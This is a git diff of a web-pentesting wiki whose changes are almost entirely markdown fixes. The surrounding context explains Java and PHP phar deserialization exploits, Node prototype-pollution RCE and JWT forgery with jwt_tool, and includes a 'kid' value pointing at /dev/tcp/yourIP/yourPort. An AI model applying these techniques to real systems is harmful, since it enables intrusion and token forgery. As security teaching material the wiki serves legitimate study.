@@ -157,12 +157,12 @@ Inside the github, [**GadgetProbe has some wordlists**](https://github.com/Bisho
 
 ## Java Deserialization Scanner
 
-This scanner can be **download **from the Burp App Store (**Extender**).\
-The **extension **has **passive **and active **capabilities**. 
+This scanner can be **download** from the Burp App Store (**Extender**).\
+The **extension** has **passive** and active **capabilities**.&#x20;
 
 ### Passive
 
-By default it **checks passively **all the requests and responses sent **looking **for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
+By default it **checks passively** all the requests and responses sent **looking** for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
 
 ![](<../../.gitbook/assets/image (290).png>)
 
@@ -171,16 +171,16 @@ By default it **checks passively **all the requests and responses sent **looking
 #### Manual Testing
 
 You can select a request, right click and `Send request to DS - Manual Testing`.\
-Then, inside the_ Deserialization Scanner Tab_ --> _Manual testing tab_ you can select the **insertion point**. And **launch the testing** (Select the appropriate attack depending on the encoding used).
+Then, inside the _Deserialization Scanner Tab_ --> _Manual testing tab_ you can select the **insertion point**. And **launch the testing** (Select the appropriate attack depending on the encoding used).
 
 ![](../../.gitbook/assets/3-1.png)
 
-Even if this is called "Manual testing", it's pretty **automated**. It will automatically check if the **deserialization **is **vulnerable **to **any ysoserial payload** checking the libraries present on the web server and will highlight the ones vulnerable. In order to **check **for **vulnerable libraries **you can select to launch **Javas Sleeps**, **sleeps **via **CPU **consumption, or using **DNS **as it has previously being mentioned.
+Even if this is called "Manual testing", it's pretty **automated**. It will automatically check if the **deserialization** is **vulnerable** to **any ysoserial payload** checking the libraries present on the web server and will highlight the ones vulnerable. In order to **check** for **vulnerable libraries** you can select to launch **Javas Sleeps**, **sleeps** via **CPU** consumption, or using **DNS** as it has previously being mentioned.
 
 #### Exploiting
 
 Once you have identified a vulnerable library you can send the request to the _Exploiting Tab_.\
-I this tab you have to **select **the **injection point **again, an **write **the **vulnerable library **you want to create a payload for, and the **command**. Then, just press the appropriate **Attack **button.
+I this tab you have to **select** the **injection point** again, an **write** the **vulnerable library** you want to create a payload for, and the **command**. Then, just press the appropriate **Attack** button.
 
 ![](<../../.gitbook/assets/4 (1).png>)
 
diff --git a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
index 6ed5aec9..25921410 100644
--- a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
+++ b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -45,7 +45,7 @@ public class CommonsCollections1PayloadOnly {
 If you don't know anything about java deserialization payloads could be difficult to figure out why this code will execute a calc.
 
 First of all you need to know that a **Transformer in Java** is something that **receives a class** and **transforms it to a different one**. \
-Also it's interesting to know that the **payload **being **executed **here is **equivalent **to:
+Also it's interesting to know that the **payload** being **executed** here is **equivalent** to:
 
 ```java
 Runtime.getRuntime().exec(new String[]{"calc.exe"});
@@ -61,7 +61,7 @@ Or **more exactly**, what is going to be executed at the end would be:
 
 So, how is the first payload presented equivalent to those "simple" one-liners?
 
-**First **of all, you can notice in the payload that a **chain (array) of transforms are created**:
+**First** of all, you can notice in the payload that a **chain (array) of transforms are created**:
 
 ```java
 String[] command = {"calc.exe"};
@@ -139,7 +139,7 @@ public Object transform(Object object) {
 }
 ```
 
-So, remember that inside **factory **we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input **and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
+So, remember that inside **factory** we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
 
 ### Summary
 
@@ -172,7 +172,7 @@ _Note how `value` is the input of each transform and the output of the previous
 ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
 ```
 
-Note that here it **was explained the gadgets** used for the **ComonsCollections1 **payload. But it's left **how all this starts it's executing**. You can see [here that **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), in order to execute this payload, uses an `AnnotationInvocationHandler` object because **when this object gets deserialized**, it will **invoke **the `payload.get()` function that will **execute the whole payload**.
+Note that here it **was explained the gadgets** used for the **ComonsCollections1** payload. But it's left **how all this starts it's executing**. You can see [here that **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), in order to execute this payload, uses an `AnnotationInvocationHandler` object because **when this object gets deserialized**, it will **invoke** the `payload.get()` function that will **execute the whole payload**.
 
 ## Java Thread Sleep
 
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
index 7f5178d8..bc40b901 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
@@ -1,6 +1,6 @@
 # NodeJS - \_\_proto\_\_ & prototype Pollution
 
-## Objects in JavaScript <a href="053a" id="053a"></a>
+## Objects in JavaScript <a href="#053a" id="053a"></a>
 
 First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
 
@@ -16,7 +16,7 @@ console.log(Object.create(null)); // prints an empty object
 
 Previously we learned that an Object in javascript is  collection of keys and values, so it makes sense that a `null` object is just an empty dictionary: `{}`
 
-## Functions / Classes in Javascript <a href="55dd" id="55dd"></a>
+## Functions / Classes in Javascript <a href="#55dd" id="55dd"></a>
 
 In Javascript, the concepts of the class and the function are quite interrelated (the function itself acts as the constructor for the class and the actual nature has no concept of “class” in javascript). Let’s see the following example:
 
@@ -38,7 +38,7 @@ var person1 = new person("Satoshi", 70);
 
 ![](<../../../.gitbook/assets/image (362).png>)
 
-## Prototypes in JavaScript <a href="3843" id="3843"></a>
+## Prototypes in JavaScript <a href="#3843" id="3843"></a>
 
 One thing to note is that the prototype attribute can be changed/modified/deleted when executing the code. For example functions to the class can be dynamically added:
 
@@ -58,9 +58,9 @@ Note that, if you add a property to an object that is used as the prototype for
 
 ![](<../../../.gitbook/assets/image (366).png>)
 
-## \_\_proto\_\_ pollution <a href="0d0a" id="0d0a"></a>
+## \_\_proto\_\_ pollution <a href="#0d0a" id="0d0a"></a>
 
-You should have already learned that** every object in JavaScript is simply a collection of key and value** pairs and that **every object inherits from the Object type in JavaScript**. This means that if you are able to pollute the Object type **each JavaScript object of the environment is going to be polluted!**
+You should have already learned that **every object in JavaScript is simply a collection of key and value** pairs and that **every object inherits from the Object type in JavaScript**. This means that if you are able to pollute the Object type **each JavaScript object of the environment is going to be polluted!**
 
 This is fairly simple, you just need to be able to modify some properties (key-value pairs) from and arbitrary JavaScript object, because as each object inherits from Object, each object can access Object scheme.
 
@@ -97,7 +97,7 @@ So now each JS object will contain the new properties: the function `printHello`
 
 ## prototype pollution
 
-This technique isn't as effective as the previous one as you cannot pollute the scheme of JS Object. But in cases where the** keyword `__proto__`is forbidden this technique can be useful**.
+This technique isn't as effective as the previous one as you cannot pollute the scheme of JS Object. But in cases where the **keyword `__proto__`is forbidden this technique can be useful**.
 
 If you are able to modify the properties of a function, you can modify the `prototype` property of the function and **each new property that you adds here will be inherit by each object created from that function:**
 
@@ -122,7 +122,7 @@ In this case only the **objects created from the `person`** class will be affect
 
 **There are 2 ways to abuse prototype pollution to poison EVERY JS object.**
 
-The first one would be to pollute the property prototype of **Object **(as it was mentioned before every JS object inherits from this one):
+The first one would be to pollute the property prototype of **Object** (as it was mentioned before every JS object inherits from this one):
 
 ```javascript
 Object.prototype.sayBye = function(){console.log("bye!")}
@@ -206,7 +206,7 @@ You can observe that the merge function is coping one by one all the key-value p
 #### RCE abusing environmental variables
 
 This trick was taken from [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/).\
-Basically, **if a new process** using node is **spawned **and you are able to **poison the environmental variables** it's possible to **execute arbitrary commands**.\
+Basically, **if a new process** using node is **spawned** and you are able to **poison the environmental variables** it's possible to **execute arbitrary commands**.\
 It's also **possible to poison environmental variables** y setting the **`env`** property in some object inside JS.\
 For more information about why this works read the previously indicated URL.
 
@@ -231,7 +231,7 @@ let proc = fork('VersionCheck.js', [], {
 });
 ```
 
-Executing any of the** last 2 chunks of code** (and creating some `VersionCheck.js` file) the file `/tmp/hacktricks` is going to be created.
+Executing any of the **last 2 chunks of code** (and creating some `VersionCheck.js` file) the file `/tmp/hacktricks` is going to be created.
 
 Going back to the initial example if you substitute the `USERINPUT` with the following line arbitrary command execution will be achieved:
 
@@ -325,7 +325,7 @@ This is done by the `appendContent` function of `javascript-compiler.js`\
 
 `pushSource` makes the `pendingContent` to `undefined`, preventing the string from being inserted multiple times.
 
-#### Exploit <a href="exploit" id="exploit"></a>
+#### Exploit <a href="#exploit" id="exploit"></a>
 
 ![img](https://blog.p6.is/img/2020/08/graph\_5.jpg)
 
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index 09968f9d..98c665c4 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -2,11 +2,11 @@
 
 ## Discovering using Automatic tools
 
-The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0) and [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap)** **can be used to **find prototype pollution vulnerabilities**.&#x20;
+The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0) and [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **** can be used to **find prototype pollution vulnerabilities**.&#x20;
 
-Moreover, you could also use the **browser extension **[**PPScan**](https://github.com/msrkp/PPScan) to **automatically** **scan** the **pages** you **access** for prototype pollution vulnerabilities.
+Moreover, you could also use the **browser extension** [**PPScan**](https://github.com/msrkp/PPScan) to **automatically** **scan** the **pages** you **access** for prototype pollution vulnerabilities.
 
-### Finding the root cause of Prototype Pollution <a href="5530" id="5530"></a>
+### Finding the root cause of Prototype Pollution <a href="#5530" id="5530"></a>
 
 Once any of the tools have **identified** a **prototype pollution vulnerability**, if the **code** is **not** very **complex**,  you can **search** the JS code for the **keywords** **`location.hash/decodeURIComponent/location.search`** in Chrome Developer Tools and find the vulnerable place.
 
diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md
index ed61b549..f2d426f6 100644
--- a/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -2,7 +2,7 @@
 
 ## Yaml **Deserialization**
 
-**Yaml **python libraries is also capable to** serialize python objects** and not just raw data:
+**Yaml** python libraries is also capable to **serialize python objects** and not just raw data:
 
 ```
 print(yaml.dump(str("lol")))
@@ -47,7 +47,7 @@ print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
 #deserialize the python object
 ```
 
-The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
+The previous code used **unsafe\_load** to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
 
 ### Basic Exploit
 
diff --git a/pentesting-web/email-header-injection.md b/pentesting-web/email-header-injection.md
index 66d914e8..ccb00280 100644
--- a/pentesting-web/email-header-injection.md
+++ b/pentesting-web/email-header-injection.md
@@ -62,7 +62,7 @@ An attacker can **inject extract parameters for sendmail** in this case.
 
 #### Differences in the implementation of /usr/sbin/sendmail
 
-**sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters **vary greatly depending on the MTA installed.
+**sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.
 
 Here are a few examples of different man pages of sendmail command/interface:
 
diff --git a/pentesting-web/file-inclusion/phar-deserialization.md b/pentesting-web/file-inclusion/phar-deserialization.md
index f003bec7..ab6e9126 100644
--- a/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/pentesting-web/file-inclusion/phar-deserialization.md
@@ -1,8 +1,8 @@
 # phar:// deserialization
 
-**Phar** files (PHP Archive) files** contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code.
+**Phar** files (PHP Archive) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code.
 
-The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file_get_contents(), fopen(), file() or file_exists(), md5\_file(), filemtime() or filesize()**.
+The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file\_get\_contents(), fopen(), file() or file\_exists(), md5\_file(), filemtime() or filesize()**.
 
 So, imagine a situation where you can make a PHP web get the size of an arbitrary file an arbitrary file using the **`phar://`** protocol, and inside the code you find a **class** similar to the following one:
 
@@ -24,7 +24,7 @@ filesize("phar://test.phar"); #The attacker can control this path
 ```
 {% endcode %}
 
-You can create a **phar** file that when loaded will** abuse this class to execute arbitrary command**s with something like:
+You can create a **phar** file that when loaded will **abuse this class to execute arbitrary command**s with something like:
 
 {% code title="create_phar.php" %}
 ```php
@@ -55,7 +55,7 @@ $phar->stopBuffering();
 {% endcode %}
 
 Note how the **magic bytes of JPG** (`\xff\xd8\xff`) are added at the beginning of the phar file to **bypass** **possible** file **uploads** **restrictions**.\
-**Compile** the` test.phar` file with:
+**Compile** the `test.phar` file with:
 
 ```bash
 php --define phar.readonly=0 create_phar.php
diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md
index b14ccae8..3ef11a40 100644
--- a/pentesting-web/file-upload/README.md
+++ b/pentesting-web/file-upload/README.md
@@ -142,7 +142,7 @@ Note that **another option** you may be thinking of to bypass this check is to m
 * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
 * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
 * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
-* Upload the **\*\*\[**eicar**]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any **antivirus\*\*
+* Upload the **\*\*\[**eicar**]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\*
 * Check if there is any **size limit** uploading files
 
 Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
@@ -167,7 +167,7 @@ Here’s a top 10 list of things that you can achieve by uploading (from [link](
 * **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
 * **JPG**: `"\xff\xd8\xff"`
 
-Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
+Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
 
 ## Zip File Automatically decompressed Upload
 
diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md
index 4ce51fde..9e1b3c7c 100644
--- a/pentesting-web/formula-injection.md
+++ b/pentesting-web/formula-injection.md
@@ -2,10 +2,10 @@
 
 ## Info
 
-If your **input **is being **reflected **inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas **that will be **executed **when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
+If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
 
 {% hint style="danger" %}
-Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload. 
+Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.&#x20;
 {% endhint %}
 
 ## Hyperlink
@@ -35,7 +35,7 @@ The details of student in logged in the attackers web server.
 
 For this example to work it's **needed to have enable the following configuration**:\
 File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
-or the use of an** old Excel version**.
+or the use of an **old Excel version**.
 
 The good news is that **this payload is executed automatically when the file is opened** (f the user accepts the warnings).
 
diff --git a/pentesting-web/h2c-smuggling.md b/pentesting-web/h2c-smuggling.md
index c75c9373..a0371a83 100644
--- a/pentesting-web/h2c-smuggling.md
+++ b/pentesting-web/h2c-smuggling.md
@@ -1,12 +1,12 @@
 # H2C Smuggling
 
-**This information was taken from **[**https://blog.assetnote.io/2021/03/18/h2c-smuggling/**](https://blog.assetnote.io/2021/03/18/h2c-smuggling/)**, for more information follow the link.**
+**This information was taken from** [**https://blog.assetnote.io/2021/03/18/h2c-smuggling/**](https://blog.assetnote.io/2021/03/18/h2c-smuggling/)**, for more information follow the link.**
 
-## HTTP2 Over Cleartext (H2C) <a href="http2-over-cleartext-h2c" id="http2-over-cleartext-h2c"></a>
+## HTTP2 Over Cleartext (H2C) <a href="#http2-over-cleartext-h2c" id="http2-over-cleartext-h2c"></a>
 
 A normal HTTP connection typically lasts only for the duration of a single request. However, H2C or “**http2 over cleartext”** is where a normal transient http **connection is upgraded to a persistent connection that uses the http2 binary protocol** to communicate continuously instead of for one request using the plaintext http protocol.
 
-The second part of the smuggling occurs when a** reverse proxy is used**. Normally, when http requests are made to a reverse proxy, the proxy will handle the request, process a series of routing rules, then forward the request onto the backend and then return the response. When a http request includes a `Connection: Upgrade` header, such as for a websocket connection, the reverse **proxy will maintain the persistent connection** between the client and server, **allowing for the continuous communication needed for these procotols**. For a H2C Connection, the RFC requires 3 headers to be present:
+The second part of the smuggling occurs when a **reverse proxy is used**. Normally, when http requests are made to a reverse proxy, the proxy will handle the request, process a series of routing rules, then forward the request onto the backend and then return the response. When a http request includes a `Connection: Upgrade` header, such as for a websocket connection, the reverse **proxy will maintain the persistent connection** between the client and server, **allowing for the continuous communication needed for these procotols**. For a H2C Connection, the RFC requires 3 headers to be present:
 
 ```
 Upgrade: h2c
@@ -18,9 +18,9 @@ So where is the bug? **When upgrading a connection, the reverse proxy will often
 
 ![](<../.gitbook/assets/image (454).png>)
 
-## Exploitation <a href="exploitation" id="exploitation"></a>
+## Exploitation <a href="#exploitation" id="exploitation"></a>
 
-The original blog post points out that not all servers will forward the required headers for a compliant H2C connection upgrade. This means load balancers like AWS ALB/CLB, NGINX, and Apache Traffic Server amongst others will **prevent a H2C connection by default**. However, at the end of the blog post, he does mention that “not all backends were compliant, and we could **test with the non-compliant `Connection: Upgrade` variant, where the `HTTP2-Settings` value is omitted **from the `Connection` header.”
+The original blog post points out that not all servers will forward the required headers for a compliant H2C connection upgrade. This means load balancers like AWS ALB/CLB, NGINX, and Apache Traffic Server amongst others will **prevent a H2C connection by default**. However, at the end of the blog post, he does mention that “not all backends were compliant, and we could **test with the non-compliant `Connection: Upgrade` variant, where the `HTTP2-Settings` value is omitted** from the `Connection` header.”
 
-Using the tools** **[**https://github.com/BishopFox/h2csmuggler**](https://github.com/BishopFox/h2csmuggler)** and **[**https://github.com/assetnote/h2csmuggler**](https://github.com/assetnote/h2csmuggler)** **you can try to **bypass the protections imposed** by the proxy establishing a H2C connection and access proxy protected resources.
+Using the tools **** [**https://github.com/BishopFox/h2csmuggler**](https://github.com/BishopFox/h2csmuggler) **and** [**https://github.com/assetnote/h2csmuggler**](https://github.com/assetnote/h2csmuggler) **** you can try to **bypass the protections imposed** by the proxy establishing a H2C connection and access proxy protected resources.
 
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
index 9d9d00af..5202d6cd 100644
--- a/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -1,11 +1,11 @@
 # JWT Vulnerabilities (Json Web Tokens)
 
-**Part of this post was taken from:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\
-**Author of the great tool to pentest JWTs** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool)
+**Part of this post was taken from:** [**https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt\_tool/wiki/Attack-Methodology)\
+**Author of the great tool to pentest JWTs** [**https://github.com/ticarpi/jwt\_tool**](https://github.com/ticarpi/jwt\_tool)
 
 ## **Quick Wins**
 
-Run [**jwt_tool**](https://github.com/ticarpi/jwt_tool)** **with mode `All Tests!` and wait for green lines
+Run [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) **** with mode `All Tests!` and wait for green lines
 
 ```bash
 python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" -rh "Authorization: Bearer eyJhbG...<JWT Token>"
@@ -77,7 +77,7 @@ This can be done with the "JSON Web Tokens" Burp extension.\
 
 If the token uses a “jku” Header claim then check out the provided URL. This should point to a URL containing the JWKS file that holds the Public Key for verifying the token. Tamper the token to point the jku value to a web service you can monitor traffic for.
 
-If you get an HTTP interaction you now know that the server is trying to load keys from the URL you are supplying. _Use jwt_tool's -S flag alongside the -u_ [_http://example.com_](http://example.com) _argument to generate a new key pair, inject your provided URL, generate a JWKS containing the Public Key, and sign the token with the Private Key_
+If you get an HTTP interaction you now know that the server is trying to load keys from the URL you are supplying. _Use jwt\_tool's -S flag alongside the -u_ [_http://example.com_](http://example.com) _argument to generate a new key pair, inject your provided URL, generate a JWKS containing the Public Key, and sign the token with the Private Key_
 
 ## Kid issues
 
@@ -89,14 +89,14 @@ If the claim "kid" is used in the header, check the web directory for that file
 
 ### "kid" issues - path traversal
 
-If the claim "kid" is used in the header, check if you can use a different file in the file system. Pick a file you might be able to predict the content of, or maybe try `"kid":"/dev/tcp/yourIP/yourPort" `to test connectivity, or even some **SSRF** payloads...\
-_Use jwt_tool's -T flag to tamper the JWT and change the value of the kid claim, then choose to keep the original signature_
+If the claim "kid" is used in the header, check if you can use a different file in the file system. Pick a file you might be able to predict the content of, or maybe try `"kid":"/dev/tcp/yourIP/yourPort"` to test connectivity, or even some **SSRF** payloads...\
+_Use jwt\_tool's -T flag to tamper the JWT and change the value of the kid claim, then choose to keep the original signature_
 
 ```bash
 python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
 ```
 
-Using files inside the host with known content you can also forge a valid JWT. For example, in linux systems the file `/proc/sys/kernel/randomize_va_space` has the value set to **2**. So, putting that **path **inside the "**kid**" parameter and using "**2**" as the **symetric password** to generate the JWT you should be able to generate a valid new JWT.
+Using files inside the host with known content you can also forge a valid JWT. For example, in linux systems the file `/proc/sys/kernel/randomize_va_space` has the value set to **2**. So, putting that **path** inside the "**kid**" parameter and using "**2**" as the **symetric password** to generate the JWT you should be able to generate a valid new JWT.
 
 ### "kid" issues - SQL Injection
 
@@ -120,7 +120,7 @@ If you observe the JWT being issued or renewed via a third-party service then it
 #### Is exp checked?
 
 The “exp” Payload claim is used to check the expiry of a token. As JWTs are often used in the absence of session information, so they do need to be handled with care - in many cases capturing and replaying someone else’s JWT will allow you to masquerade as that user.\
-One mitigation against JWT replay attacks (that is advised by the JWT RFC) is to use the “exp” claim to set an expiry time for the token. It is also important to set the relevant checks in place in the application to make sure this value is processed and the token rejected where it is expired. If the token contains an “exp” claim and test time limits permit it - try storing the token and replaying it after the expiry time has passed. _Use jwt_tool's -R flag to read the content of the token, which includes timestamp parsing and expiry checking (timestamp in UTC)_
+One mitigation against JWT replay attacks (that is advised by the JWT RFC) is to use the “exp” claim to set an expiry time for the token. It is also important to set the relevant checks in place in the application to make sure this value is processed and the token rejected where it is expired. If the token contains an “exp” claim and test time limits permit it - try storing the token and replaying it after the expiry time has passed. _Use jwt\_tool's -R flag to read the content of the token, which includes timestamp parsing and expiry checking (timestamp in UTC)_
 
 * If the token still validates in the application then this may be a security risk as the token may NEVER expire.
 
@@ -139,7 +139,7 @@ openssl rsa -in keypair.pem -pubout -out publickey.crt
 openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
 ```
 
-Then you can use for example [**jwt.io**](https://jwt.io)** **to create the new JWT with the **created public and private keys and pointing the parameter jku to the certificate created. **In order to create a valid jku certificate you can download the original one anche change the needed parameters.
+Then you can use for example [**jwt.io**](https://jwt.io) **** to create the new JWT with the **created public and private keys and pointing the parameter jku to the certificate created.** In order to create a valid jku certificate you can download the original one anche change the needed parameters.
 
 You can obtain the parametes "e" and "n" from a public certificate using:
 
@@ -165,11 +165,11 @@ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out at
 openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
 ```
 
-Then you can use for example [**jwt.io**](https://jwt.io)** **to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
+Then you can use for example [**jwt.io**](https://jwt.io) **** to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
 
 ![](<../.gitbook/assets/image (439).png>)
 
-You can also abuse both of these vulns** for SSRFs**.
+You can also abuse both of these vulns **for SSRFs**.
 
 ### x5c
 
diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md
index f0f6c36e..601c3e02 100644
--- a/pentesting-web/hacking-with-cookies/README.md
+++ b/pentesting-web/hacking-with-cookies/README.md
@@ -6,7 +6,7 @@ If you find some kind of custom cookie containing sensitive data (sessionID, use
 
 ### Decoding the cookie
 
-If the **cookie **is using some **Base encoding **(like Base64) or similar you may be able to **decode it**, **change **the **content **and **impersonate **arbitrary users.
+If the **cookie** is using some **Base encoding** (like Base64) or similar you may be able to **decode it**, **change** the **content** and **impersonate** arbitrary users.
 
 ### Session Hijacking
 
@@ -16,7 +16,7 @@ Steal a cookie and use it to impersonate the user inside an application
 
 The attacker get a cookie from a web page and send to the victim a link so the **victim logins using the cookie of the attacker**. If the cookie is not changed when a user logs in, this could be useful because the attacker could be able to impersonate the user using the cookie.
 
-If you found a **XSS in a subdomain** or you** control a subdomain**, read:
+If you found a **XSS in a subdomain** or you **control a subdomain**, read:
 
 {% content-ref url="cookie-tossing.md" %}
 [cookie-tossing.md](cookie-tossing.md)
@@ -26,7 +26,7 @@ If you found a **XSS in a subdomain** or you** control a subdomain**, read:
 
 The attacker sends his own session to the victim. The victim will see that he is already loged and will suppose that he is inside his own account but **the actions will be performed inside the attackers account**.
 
-If you found a **XSS in a subdomain** or you** control a subdomain**, read:
+If you found a **XSS in a subdomain** or you **control a subdomain**, read:
 
 {% content-ref url="cookie-tossing.md" %}
 [cookie-tossing.md](cookie-tossing.md)
@@ -40,7 +40,7 @@ Click on the previous link to access a page explaining possible flaws in JWT.
 
 #### **Basic checks**
 
-* The **cookie **are the **same **every time you **login**
+* The **cookie** are the **same** every time you **login**
 * Log out and try to use the same cookie
 * Try to login with 2 devices (or browsers) to the same account using the same cookie
 * Check if the cookie has any information in it and try to modify it
@@ -112,7 +112,7 @@ There should be a pattern (with the size of a used block). So, knowing how are a
 
 ### **Domain**
 
-The `Domain` attribute specifies **which hosts can receive a cookie**. If unspecified, the attribute **defaults **to the** same host** that set the cookie, _**excluding subdomains**_. **If `Domain` **_**is**_** specified, then subdomains are always included**. Therefore, specifying `Domain` is less restrictive than omitting it. However, it can be helpful when subdomains need to share information about a user.
+The `Domain` attribute specifies **which hosts can receive a cookie**. If unspecified, the attribute **defaults** to the **same host** that set the cookie, _**excluding subdomains**_. **If `Domain`  **_**is**_** specified, then subdomains are always included**. Therefore, specifying `Domain` is less restrictive than omitting it. However, it can be helpful when subdomains need to share information about a user.
 
 For example, if you set `Domain=mozilla.org`, cookies are available on subdomains like `developer.mozilla.org`. But if you don't, the cookie won't be sent to subdomains.
 
@@ -122,7 +122,7 @@ The `Path` attribute indicates a **URL path that must exist in the requested URL
 
 ### SameSite
 
-This will indicate the browser if the **cookie **can be sent **from other domains**. It has 3 possible values:
+This will indicate the browser if the **cookie** can be sent **from other domains**. It has 3 possible values:
 
 * **Strict**: The cookie will not be sent along with request by third party websites.
 * **Lax**: The cookie will be sent along with the GET request initiated by third party websites.
@@ -139,20 +139,20 @@ This will indicate the browser if the **cookie **can be sent **from other domain
 | Image            | \<img src="...">                   | Normal           |
 
